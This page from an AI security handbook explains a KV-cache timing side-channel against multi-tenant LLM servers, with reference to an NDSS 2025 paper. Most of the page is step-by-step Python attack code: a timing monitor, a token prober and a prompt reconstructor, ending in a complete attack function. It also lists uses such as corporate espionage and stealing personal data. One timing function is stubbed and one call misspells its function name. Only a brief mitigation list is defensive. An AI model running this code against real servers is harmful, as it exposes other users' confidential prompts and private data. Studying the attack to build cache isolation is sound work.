AI Security Handbook

Multi-tenant LLM servers share KV-cache between users for efficiency. This creates a massive side-channel vulnerability. You can monitor cache behavior to reconstruct other users' prompts in real-time.

Target Frameworks: vLLM, SGLang, LightLLM, DeepSpeed

Attack Flow

KV-Cache Attack Sequence

Think of KV-cache like a shared notepad that the LLM uses to remember what it just processed.

The Basic Idea:

LLM processes tokens and creates "memory" (KV-cache) for each one
When multiple users have similar prompts, the server reuses this memory
Cache hits = fast response, cache misses = slow response
By timing responses, you can figure out what's cached (and what other users asked)

Why Servers Do This:

Each token needs ~1MB of KV-cache memory
GPU memory is expensive and limited
Sharing cache across users saves massive amounts of memory and computation

def simple_kv_cache_example():
    """Dead simple example of how KV-cache sharing works"""
    
    # Imagine these are two user requests
    user1_prompt = "Help me translate this sentence into English"
    user2_prompt = "Help me translate this sentence into French"
    
    # Server processes user1 first
    user1_tokens = user1_prompt.split()
    kv_cache = {}
    
    print("Processing User 1:")
    for i, token in enumerate(user1_tokens):
        # Simulate creating KV cache for each token
        cache_key = " ".join(user1_tokens[:i+1])
        kv_cache[cache_key] = f"kv_data_for_{token}"
        print(f"  Cached: '{cache_key}'")
    
    print(f"\nKV Cache now contains {len(kv_cache)} entries")
    
    # User2 request comes in
    user2_tokens = user2_prompt.split()
    cache_hits = 0
    cache_misses = 0
    
    print("\nProcessing User 2:")
    for i, token in enumerate(user2_tokens):
        cache_key = " ".join(user2_tokens[:i+1])
        
        if cache_key in kv_cache:
            print(f"CACHE HIT: '{cache_key}' (fast response)")
            cache_hits += 1
        else:
            print(f"CACHE MISS: '{cache_key}' (slow response)")
            kv_cache[cache_key] = f"kv_data_for_{token}"
            cache_misses += 1
    
    print(f"\nResults: {cache_hits} hits, {cache_misses} misses")
    print("An attacker can infer User 1's prompt by observing these patterns!")

# Run the example
simple_kv_cache_example()

# Output shows:
# - First 6 tokens are cache hits (shared between prompts)
# - Last 2 tokens are cache misses (different between prompts)
# - Timing differences reveal the shared prefix!

Key Insight: Cache behavior creates a timing side-channel that leaks information about what other users have asked.

Longest Prefix Match (LPM):

Server prioritizes requests that share the longest prefix with cached data
Example: If "Imagine you are an expert" is cached, requests starting with this get priority
This optimization makes the side-channel even more exploitable

def lpm_scheduling_example():
    """How LPM scheduling works and why it's exploitable"""
    
    # Current cache contains this prompt
    cached_prompt = "Imagine you are an expert programmer. Write a function to"
    cached_tokens = cached_prompt.split()
    
    # Three new requests come in
    requests = [
        "Imagine you are an expert programmer. Debug this code",  # 6 token match
        "Imagine you are an expert chef. Make a recipe",          # 5 token match  
        "Write a simple hello world program",                     # 0 token match
    ]
    
    print("LPM Scheduling Priority:")
    for i, request in enumerate(requests):
        request_tokens = request.split()
        
        # Find longest matching prefix
        match_length = 0
        for j in range(min(len(cached_tokens), len(request_tokens))):
            if cached_tokens[j] == request_tokens[j]:
                match_length += 1
            else:
                break
        
        print(f"Request {i+1}: {match_length} token match - Priority {3-i}")
        print(f"  '{request}'")
    
    print("By sending requests with different prefixes and measuring response times,")
    print("you can determine what's currently cached (i.e., what others asked)!")

lmp_scheduling_example()

The Attack

Step 1: Set Up Monitoring

What we're doing: Learning how to detect cache hits vs misses.

Why: We need to distinguish between fast (cached) and slow (uncached) responses.

import time
import requests
import statistics

class CacheMonitor:
    def __init__(self, server_url):
        self.server_url = server_url
        self.baseline_times = []
        self.cache_hit_threshold = None
    
    def calibrate(self):
        """Learn what cache hits vs misses look like"""
        
        # Send requests we know will be cache misses (random strings)
        miss_times = []
        for i in range(10):
            random_prompt = f"Random uncached prompt {i} xyz123"
            response_time = self.measure_response_time(random_prompt)
            miss_times.append(response_time)
            time.sleep(0.1)  # Don't overwhelm server
        
        # Send the same request multiple times (should be cache hits after first)
        hit_times = []
        repeated_prompt = "This prompt will be cached after first request"
        for i in range(10):
            response_time = self.measure_response_time(repeated_prompt)
            if i > 0:  # Skip first request (that's the miss)
                hit_times.append(response_time)
            time.sleep(0.1)
        
        # Calculate threshold
        avg_miss_time = statistics.mean(miss_times)
        avg_hit_time = statistics.mean(hit_times)
        self.cache_hit_threshold = (avg_miss_time + avg_hit_time) / 2
        
        print(f"  Cache miss avg: {avg_miss_time:.3f}s")
        print(f"  Cache hit avg: {avg_hit_time:.3f}s") 
        print(f"  Threshold: {self.cache_hit_threshold:.3f}s")
        
        return avg_miss_time > avg_hit_time  # Sanity check
    
    def measure_response_time(self, prompt):
        """Measure how long server takes to respond"""
        ...
    
    def is_cache_hit(self, prompt):
        """Determine if a prompt results in cache hit"""
        response_time = self.measure_response_time(prompt)
        return response_time < self.cache_hit_threshold
    
    def probe_token_sequence(self, token_sequence):
        """Test if a specific token sequence is cached"""
        prompt = " ".join(token_sequence)
        is_hit = self.is_cache_hit(prompt)
        
        print(f"Probe: '{prompt[:50]}...' -> {'HIT' if is_hit else 'MISS'}")
        return is_hit


monitor = CacheMonitor("http://llm-server:8000")
if monitor.calibrate():
    print("✅ Calibration successful - ready to attack!")
else:
    print("❌ Calibration failed - server might not be vulnerable")

Step 2: Probe with Candidate Tokens

What we're doing: Testing different token combinations to see what's cached.

Why: Cached tokens reveal what other users have asked.

Simple analogy: Like playing 20 questions, but the speed of the answer tells you if you're on the right track.

class TokenProber:
    def __init__(self, monitor):
        self.monitor = monitor
        self.common_tokens = [
            # Common prompt starters
            "Imagine", "you", "are", "an", "expert", "in",
            "Help", "me", "with", "this", "problem",
            "Write", "a", "function", "that", "can",
            "Translate", "the", "following", "text", "into",
            "Explain", "how", "to", "solve", "this",
            # Common words
            "the", "and", "or", "but", "for", "to", "of", "in", "on", "at",
            # Technical terms
            "code", "program", "algorithm", "data", "system", "network",
            "security", "password", "login", "database", "server"
        ]
    
    def find_cached_prefix(self, max_length=10):
        """Find the longest cached token sequence"""
        
        cached_sequence = []
        
        for position in range(max_length):
            print(f"\nTesting position {position + 1}:")
            found_token = None
            
            # Try each common token at this position
            for token in self.common_tokens:
                test_sequence = cached_sequence + [token]
                
                if self.monitor.probe_token_sequence(test_sequence):
                    print(f"Found token: '{token}'")
                    found_token = token
                    break
                else:
                    print(f"Not cached: '{token}'")
            
            if found_token:
                cached_sequence.append(found_token)
                print(f"Current sequence: {' '.join(cached_sequence)}")
            else:
                print(f"No more tokens found at position {position + 1}")
                break
        
        return cached_sequence
    
    def refine_sequence(self, base_sequence):
        """Try to find more specific tokens after the base sequence"""
        print(f"\nRefining sequence: '{' '.join(base_sequence)}'")
        
        # Try common continuations
        continuations = [
            ["programmer", "developer", "engineer", "coder"],
            ["write", "create", "build", "develop", "make"],
            ["function", "method", "class", "script", "program"],
            ["that", "which", "to", "for", "with"],
            ["can", "will", "should", "must", "could"]
        ]
        
        refined_sequence = base_sequence.copy()
        
        for continuation_set in continuations:
            found_continuation = None
            
            for token in continuation_set:
                test_sequence = refined_sequence + [token]
                
                if self.monitor.probe_token_sequence(test_sequence):
                    print(f"Found continuation: '{token}'")
                    found_continuation = token
                    break
            
            if found_continuation:
                refined_sequence.append(found_continuation)
            else:
                break
        
        return refined_sequence

prober = TokenProber(monitor)
cached_prefix = prober.find_cached_prefix()
if cached_prefix:
    refined_sequence = prober.refine_sequence(cached_prefix)
    print(f"\nReconstructed prompt prefix: '{' '.join(refined_sequence)}'")

Step 3: Reconstruct Full Prompts

What we're doing: Piecing together the complete prompt from the cached tokens.

Why: This gives us the full sensitive information other users submitted.

class PromptReconstructor:
    def __init__(self, monitor):
        self.monitor = monitor
        self.vocabulary = self.load_vocabulary()
    
    def load_vocabulary(self):
        """Load common words and phrases for reconstruction"""
        return {
            'starters': [
                "Imagine you are", "Help me", "Write a", "Create a", 
                "Explain how", "Show me", "Tell me", "Generate"
            ],
            'roles': [
                "expert programmer", "security analyst", "data scientist",
                "system administrator", "network engineer", "AI researcher"
            ],
            'actions': [
                "write code", "debug this", "analyze data", "solve problem",
                "create script", "build system", "design algorithm"
            ],
            'objects': [
                "function", "class", "script", "program", "algorithm",
                "database", "network", "system", "application"
            ],
            'connectors': ["that", "which", "to", "for", "with", "in", "on", "at"],
            'endings': ["please", "thanks", "help", "urgent", "asap"]
        }
    
    def reconstruct_template(self, known_prefix):
        """Reconstruct prompt template from known prefix"""
        print(f"🔨 Reconstructing template from: '{' '.join(known_prefix)}'")
        
        template_parts = [known_prefix]
        current_sequence = known_prefix.copy()
        
        # Try to extend with common patterns
        for category, words in self.vocabulary.items():
            if category == 'starters':
                continue  # Already have the start
                
            print(f"\nTrying {category}:")
            found_extension = []
            
            for phrase in words:
                phrase_tokens = phrase.split()
                test_sequence = current_sequence + phrase_tokens
                
                if self.monitor.probe_token_sequence(test_sequence):
                    print(f"Found {category}: '{phrase}'")
                    found_extension = phrase_tokens
                    break
                else:
                    print(f"Not found: '{phrase}'")
            
            if found_extension:
                current_sequence.extend(found_extension)
                template_parts.append(found_extension)
        
        return current_sequence
    
    def extract_variables(self, template):
        """Try to extract variable parts of the prompt"""
        print(f"\nLooking for variable content in template...")
        
        # Common variable patterns
        variable_patterns = [
            ["this", "code"], ["this", "problem"], ["this", "data"],
            ["following", "text"], ["below", "information"],
            ["my", "project"], ["our", "system"], ["the", "issue"]
        ]
        
        variables_found = []
        
        for pattern in variable_patterns:
            test_sequence = template + pattern
            
            if self.monitor.probe_token_sequence(test_sequence):
                print(f"Found variable pattern: '{' '.join(pattern)}'")
                variables_found.append(pattern)
        
        return variables_found
    
    def full_reconstruction(self, max_attempts=50):
        """Complete prompt reconstruction process"""
        print("Starting full prompt reconstruction...")
        
        # Step 1: Find initial cached prefix
        initial_probe = TokenProber(self.monitor)
        base_prefix = initial_probe.find_cached_prefix()
        
        if not base_prefix:
            print("No cached tokens found")
            return None
        
        # Step 2: Reconstruct template
        full_template = self.reconstruct_template(base_prefix)
        
        # Step 3: Extract variables
        variables = self.extract_variables(full_template)
        
        # Step 4: Attempt to reconstruct full prompt
        reconstructed_prompt = " ".join(full_template)
        
        if variables:
            reconstructed_prompt += " [VARIABLE_CONTENT]"
        
        print(f"\nRECONSTRUCTION COMPLETE:")
        print(f"Template: '{' '.join(full_template)}'")
        print(f"Variables: {variables}")
        print(f"Full prompt: '{reconstructed_prompt}'")
        
        return {
            'template': full_template,
            'variables': variables,
            'full_prompt': reconstructed_prompt
        }

# Complete attack example
def run_complete_attack(server_url):
    """Run the complete KV-cache side-channel attack"""
    print("Starting KV-Cache Side-Channel Attack")
    
    # Step 1: Set up monitoring
    monitor = CacheMonitor(server_url)
    if not monitor.calibrate():
        print("Attack failed - server not vulnerable")
        return None
    
    # Step 2: Reconstruct prompts
    reconstructor = PromptReconstructor(monitor)
    result = reconstructor.full_reconstruction()
    
    if result:
        print("\nAttack successful!")
        return result
    else:
        print("\nAttack failed - no prompts reconstructed")
        return None

# Usage
# result = run_complete_attack("http://target-llm-server:8000")

The Big Picture:

Monitor = Learn to detect cache hits vs misses through timing
Probe = Test token combinations to find what's cached
Reconstruct = Piece together the full prompts from cached fragments

Attack Scenarios

Template Extraction

Target: Extract the structure of prompts other users are sending.

Use Case: Corporate espionage, competitive intelligence, understanding AI usage patterns.

Input Extraction

Target: Extract specific sensitive data from other users' prompts.

Use Case: Stealing proprietary information, personal data, confidential documents.

Target: Reconstruct prompts with no prior knowledge.

Use Case: General surveillance, discovering unknown attack vectors.

Mitigation

Implement user-specific cache isolation.
Add random delays to mask cache timing.
Implement rate limiting to prevent rapid probing.

References

[1] Wu, G., et al. (2025). I Know What You Asked: Prompt Leakage via KV-Cache Sharing in Multi-Tenant LLM Serving. NDSS 2025. https://www.ndss-symposium.org/wp-content/uploads/2025-1772-paper.pdf

AI Security Handbook: Develop Secure AI Systems